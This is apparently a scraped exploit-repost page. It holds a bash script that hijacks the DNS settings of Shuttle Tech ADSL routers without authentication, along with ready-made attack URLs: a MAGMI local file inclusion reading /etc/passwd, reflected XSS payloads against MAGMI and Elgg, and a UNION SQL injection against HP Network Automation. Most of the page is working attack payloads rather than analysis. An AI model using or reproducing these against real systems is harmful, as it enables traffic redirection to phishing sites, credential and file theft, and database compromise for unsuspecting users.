HACKER · %s · %s

#!/bin/bash # # Shuttle Tech ADSL Modem-Router 915 WM # Unauthenticated Remote DNS Change Exploit # # Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> # http://www.ethical-hacker.org/ # # Description: # The vulnerability exist in the web interface, which is # accessible without authentication. # # Once modified, systems use foreign DNS servers, which are # usually set up by cybercriminals. Users with vulnerable # systems or devices who try to access certain sites are # instead redirected to possibly malicious sites. # # Modifying systems' DNS settings allows cybercriminals to # perform malicious activities like: # # o Steering unknowing users to bad sites: # These sites can be phishing pages that # spoof well-known sites in order to # trick users into handing out sensitive # information. # # o Replacing ads on legitimate sites: # Visiting certain sites can serve users # with infected systems a different set # of ads from those whose systems are # not infected. # # o Controlling and redirecting network traffic: # Users of infected systems may not be granted # access to download important OS and software # updates from vendors like Microsoft and from # their respective security vendors. # # o Pushing additional malware: # Infected systems are more prone to other # malware infections (e.g., FAKEAV infection). # # Warning: # My first public report on such a serious # vulnerability was ignored by the manufacturers # and were committed serious criminal deeds of # cybercriminals in Brasil. This vulnerability # could affect millions of users worldwide. # http://www.exploit-db.com/exploits/16275/ # http://securelist.com/blog/research/57776/the-tale-of-one-thousand-and-one-dsl-modems/ # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use them at your own risk! # # if [[ $# -gt 3 || $# -lt 2 ]]; then echo " Shuttle Tech ADSL Modem-Router 915 WM" echo " Unauthenticated Remote DNS Change Exploit" echo " ================================================================" echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>" echo " Example: $0 133.7.133.7 8.8.8.8" echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4" echo "" echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>" echo " http://www.ethical-hacker.org/" exit; fi GET=`which GET 2>/dev/null` if [ $? -ne 0 ]; then echo " Error : libwww-perl not found =/" exit; fi GET "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
HireHackking

Magento Server MAGMI Plugin - Multiple Vulnerabilities

HACKER · %s · %s

Exploit Title: Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting Software Link: http://sourceforge.net/projects/magmi/ Author: SECUPENT Website:www.secupent.com Email: research{at}secupent{dot}com Date: 5-2-2015 Exploit(Local file inclusion) : http://{Server}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility Screenshot: http://secupent.com/exploit/images/magmilfi.jpg Exploit(Cross Site Scripting): 1. http://{Server}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E 2. http://{Server}/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E Screenshot 1:http://secupent.com/exploit/images/magmixss1.jpg Screenshot 2: http://secupent.com/exploit/images/magmixss2.jpg Thanks for read :) Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers.
HireHackking

HP Network Automation 9.10 - SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/48924/info HP Network Automation is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. HP Network Automation 7.2x, 7.5x, 7.6x, 9.0, 9.10 are vulnerable. http://www.example.com/view.php?id=1'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11'
HireHackking
source: https://www.securityfocus.com/bid/48946/info Curverider Elgg is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Curverider Elgg versions 1.7.9 and prior are vulnerable. http://www.example.com/elgg/mod/file/search.php?subtype=file&page_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f http://www.example.com/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f&callback=true http://www.example.com/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22 http://www.example.com/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22 http://www.example.com/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22 http://www.example.com/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22